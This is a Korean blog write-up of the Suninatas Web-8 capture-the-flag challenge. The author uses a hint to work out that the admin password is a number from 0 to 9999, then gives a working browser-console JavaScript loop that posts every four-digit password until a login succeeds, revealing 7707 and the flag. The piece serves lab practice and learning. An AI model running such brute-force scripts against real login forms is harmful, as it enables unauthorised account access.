써니나타스[Web-8 문제풀이]

2025. 11. 19. 16:20·CTF/써니나타스

출처 써니나타스 Web-8

 

로그인 창인 거 같다 SQL? 문제인가? 하고 넣어봤지만 아무 일도 일어나지 않았다.

 

소스코드를 열어보았다.

 

힌트가 있었다 ID는 admin인 거 같고 password는 0~9999 사이 값 랜덤인 거 같다.

즉, 브루트포스(Brute force) 문제인 거 같다.

 

인간이 pw를 0~9999까지 치면 지치고 힘들 것이다. 때문에 자동화튤을 만들어 대입할 것이다. 또한

 

소스코드에 친절하게 파라미터 ID, PW 변수 값을 획득할 수 있었다.

 

내가 쓴 자동화튤은 이렇다.

 

(async () => {

    const url = "";  // URL 넣기
    const failKeyword = "Password Incorrect!";

    for (let i = 0; i <= 9999; i++) {

        const pw = i.toString().padStart(4, "0");
        console.log(`Trying pw = ${pw}`);

        const res = await fetch(url, {
            method: "POST",
            headers: {
                "Content-Type": "application/x-www-form-urlencoded"
            },
            body: `id=admin&pw=${pw}`
        });

        const text = await res.text();

        // 실패 문구가 없으면 성공으로 판단
        if (!text.includes(failKeyword)) {
            console.log("🎉 SUCCESS FOUND!");
            console.log("Password:", pw);
            console.log("Response:");
            console.log(text);
            break;
        }
    }

})();

 

개발자도구 console에 집어넣고 돌린다 그러면 0~9999까지 차례대로 대입해 보는데 맞는 숫자에 딱 걸리면 SUCCESS FOUND! 문구가 뜨도록 설계하였다.

 

자동화튤 사용 결과

 

7707이라는 게 알았고 뒤에 스크립트 alert(코드)가 떴다.

그래서 로그인창에 ID: admin PW:7707을 쳤더니

 

 

flag값을 얻을 수 있었다.

'CTF > 써니나타스' 카테고리의 다른 글

써니나타스[Web-23 문제풀이]  (0) 2025.12.04
써니나타스[Web-22 문제풀이]  (0) 2025.11.20
써니나타스[Web-7 문제풀이]  (0) 2025.11.17
써니나타스 [Web-6 문제풀이]  (0) 2025.11.14
써니나타스 [Web-5 문제풀이]  (0) 2025.11.12
'CTF/써니나타스' 카테고리의 다른 글
  • 써니나타스[Web-23 문제풀이]
  • 써니나타스[Web-22 문제풀이]
  • 써니나타스[Web-7 문제풀이]
  • 써니나타스 [Web-6 문제풀이]
Rookie_W
Rookie_W
Rookie 님의 블로그 입니다. IT 관련 공부(정보보안)를 하는 학생입니다. 공부하는 과정을 블로그에 남기고자 개설하였습니다.
  • Rookie_W
    Rookie 공부 노트
    Rookie_W
  • 공지사항

    • Rookie의 (정보보안) 공부 블로그 입니다.
  • 전체
    오늘
    어제
  • 블로그 메뉴

    • 홈
    • 글쓰기
    • 관리 페이지
    • 분류 전체보기 (120)
      • Programming (8)
        • Python (8)
      • IT 보안 (2)
        • ASCII Table(아스키 코드표) (1)
        • 개념 정리 (1)
      • 정보보안기사 (8)
        • 일반 (0)
        • 시스템 보안 (0)
        • 네트워크 보안 (2)
        • 웹 보안 (0)
        • 법률 (0)
      • Web Hacking Practice (57)
        • Webgoat (1)
        • 취약점 진단 (25)
        • 웹 모의해킹 (29)
        • portswigger web security ac.. (2)
      • Security Analysis & Researc.. (0)
      • Certifications (14)
        • 네트워크 관리사 (13)
        • cbt 오답노트 (1)
      • Education (8)
        • SK Shields Rookies (8)
      • CTF (13)
        • 써니나타스 (11)
        • CTFtime (2)
      • Markdown 사용법 (0)
      • Hacking tools (3)
      • Deep Learning & Machine Lea.. (5)
        • 데이터수집 (1)
        • 기초통계 (1)
        • 데이터전처리 (1)
        • 머신러닝_지도학습 (1)
        • 머신러닝_비지도학습 (1)
      • 라우터 (1)
      • 관리자전용 (0)
  • 링크

    • Github
    • Dreamhack
  • 인기 글

  • 태그

    정보수집
    linux
    네트워크
    OS injection
    모의해킹
    파일업로드
    File Inclusion
    XSS
    nos
    민감한 데이터 노출
    SK쉴더스루키즈
    정보보안기사
    루키즈34기
    써니나타스
    문제풀이
    sql injection
    루키즈
    Web-3
    보안대책
    WEB
  • hELLO· Designed By정상우.v4.10.5
Rookie_W
써니나타스[Web-8 문제풀이]
상단으로

티스토리툴바